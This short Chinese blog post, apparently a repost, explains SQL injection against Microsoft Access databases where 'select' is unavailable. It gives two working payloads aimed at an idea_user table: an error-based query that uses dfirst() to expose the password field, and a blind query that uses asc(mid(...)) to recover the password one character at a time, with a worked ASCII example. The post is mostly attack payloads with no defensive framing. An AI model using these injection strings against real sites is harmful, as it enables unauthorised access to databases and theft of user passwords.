ACCESS无select SQL注射

需要报错

select * from idea_user where id=3+(dfirst([password],([idea_user]![password])))

222.jpg

盲注

select * from idea_user where id=3+asc(mid((dfirst("[password]","[idea_user]")),1,1))-101

password字段第一个字符为e,对应ascii为101,所以id=3+101-101 还是等于3,页面返回正常

33.jpg

  原文链接:http://www.5kik.com/aspnews/597.html

相关文章

发表评论:

验证码

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。